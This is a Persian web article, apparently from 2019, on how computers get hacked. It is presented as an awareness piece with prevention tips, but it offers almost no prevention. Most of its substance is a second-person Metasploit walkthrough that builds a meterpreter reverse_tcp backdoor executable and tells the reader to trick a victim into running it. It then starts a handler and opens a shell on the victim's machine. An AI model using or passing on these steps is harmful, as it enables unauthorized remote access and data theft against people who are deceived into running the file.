هک کامپوتر چگونه انجام میشود و راه های جلوگیری از هک آن چیست؟

شاید تا به حال برای شما اتفاق افتاده باشد که مورد حمله هکرها قرار بگیرید. یکی از سیستم هایی که خیلی مورد توجه هکر ها برای هک کردن است کامپیوتر میباشد. در مطلب زیر روش های هک کامپیوتر و راه های جلوگیری از آن توضیح داده شده است.
چهارشنبه، 13 آذر 1398
تخمین زمان مطالعه:
موارد بیشتر برای شما
هک کامپوتر چگونه انجام میشود و راه های جلوگیری از هک آن چیست؟

هک کامپیوتر چگونه انجام می شود؟

در شیوه های هک کامپیوتر معمولا پر کاربردترین آن ها دسترسی به کامپیوتر و اطلاعات فرد قربانی از طریق شبکه یا اینترنت می باشد.

در این شویه هکر با استفاده از یک برنامه یا لینک های آلوده، اقدام به هک کامپیوتر فرد می نماید. انواع روش های هک کامپیوتر در ادامه ذکر شده است.
 
هک با استفاده از تروجان ها
یکی از پرکاربردترین و محبوب ترین برنامه های هک برای هکرها، استفاده از تروجان ها می باشد. تروجان ها بسیار ساده ساخته می شوند و معمولا در قالب برنامه های کاربردی و سرگرم کننده فعالیت های مخرب خود را پنهان می کنند.

به همین جهت معمولا شناسایی و کشف آن ها بسیار سخت می باشد. تروجان ها معمولا برنامه های به ظاهر ساده ای هستند که توسط برنامه نویسان حرفه ای نوشته شده اند. این برنامه ها پس از نصب در سیستم قربانی، اقدام به هک کامپیوتر وی نموده و سپس اطلاعات قربانی را سرقت خواهد نمود.
 
هک با استفاده از لینک های آلوده
یکی دیگر از روش های هک کامپیوتر و نفوذ به سیستم های رایانه ای، ترغیب کاربر قربانی به کلیک روی لینک های آلوده می باشد.

در این روش، هکر با استفاده از روش هایی که به مهندسی اجتماعی مشهور است، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند.

به عنوان مثال هکر با وعده هایی نظیر نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی، برای کاربر به نوعی دام پهن می نماید و از آن طریق کاربر را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات کاربر خواهد نمود.
 
هک با استفاده از IP و بطور مستقیم
می توان گفت که سخت ترین روش هک که به سادگی انجام پذیر نمی باشد، روش هک از طریق مستقیم و بدون نیاز به برنامه ای خاص می باشد.

در این روش هکر که از دانش برنامه نویسی و علوم کامپیوتر بالایی بهره مند است، با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، اقدام به اتصال به سیستم قربانی در شبکه نموده و آنگاه اقدام به هک کامپیوتر وی می نماید.

هکر با استفاده از دانشی که دارد، می داند که سیستم قربانی از چه نواحی آسیب پذیر بوده و با استفاده از ابزار های خود لینوکس اقدام به کشف آن آسیب پذیری ها و سپس نفوذ به کامپیوتر مربوطه می نماید.
 
آموزش هک کامپیوتر با استفاده از کالی لینوکس
برای هک کامپیوتر از طریق کالی لینوکس یک روش ساده وجود دارد که در این بخش به شما آن روش را نشان خواهیم داد تا بدانید که هکرها به چه سادگی می توانند سیستم شما هک نمایند.

در قدم اول هکر سیستم کالی لینوکس خود را باز می کند و به محیط ترمینال لینوکس می رود. دستور msfconsole را وارد کرده و تا وارد محیط متااسپلوییت گردد.

در قدم دوم با استفاده از دستور msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X > Desktop/Backdoor.exe به جای آدرس آی پی  LHOST  آدرس آی پی سیستم خود را قرار دهید. با این دستور خواهید توانست یک در پشتی (Backdoor) در سیستم عامل کالی لینوکس خود بسازید.

حال کافیست که قربانی را ترغیب به کلیک روی فایلی که شما ساخته اید کنید. یعنی به نحوی فایل ایجاد شده را برای قربانی بفرستید و او را ترغیب کنید تا آن را باز کند.

در همان خط فرمانی که بودید دستور use exploit/multi/handler را وارد کنید. سپس در خط جدید دستور set payload windows/meterpreter/reverse_tcp را وارد کنید. حال همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار دهید.

پس پایان این مراحل عبارت exploit -j –z را وارد نموده تا ماژول handler آغاز به کار نماید.

هنگامی که قربانی برنامه ای که ما ساخته ایم را اجرا نماید در محیط متااسپلوییت یک هشدار با موضوع این که یک نشست جدید در برنامه ایجاد شده است ظاهر می گردد. برای ایجاد ارتباط با این نشست، کافی است دستور sessions -i 1 را وارد کنید.

حال می بینید که اولین نشست شما با سیستم قربانی برقرار خواهد شد و پس از این قادر خواهید بود که به تمام اطلاعات سیستم قربانی دسترسی داشته باشید.

برای این کار تنها کافیست دستور Shell را در خط فرمان تایپ کنید تا به کلیه مسیر ها و پوشه های سیستم قربانی دسترسی پیدا کرده و به نوعی اقدام به هک کامپیوتر وی نمایید.
 

نتیجه گیری

همانطور که شاهد بودید با استفاده از چند ابزار ساده و صرف زمانی بسیار اندک، توانستیم یک سیستم کامپیوتری را هک کرده و به اطلاعات آن دسترسی داشته باشیم. پس این مقوله را نباید به سادگی از کنارش بگذرید.

هک کامپیوتر بسیار گسترده می باشد و برنامه ها و ابزار فراوانی برای آن وجود دارد. در وهله اول باید بدانیم برای هک نشدن خودمان چه نکاتی را باید رعایت کنیم. یعنی از ابزارها و برنامه هایی استفاده کنیم که مانعی برای هک شدن باشند.


منبع: سایت نظارت بر خانواده


ارسال نظر
با تشکر، نظر شما پس از بررسی و تایید در سایت قرار خواهد گرفت.
متاسفانه در برقراری ارتباط خطایی رخ داده. لطفاً دوباره تلاش کنید.
موارد بیشتر برای شما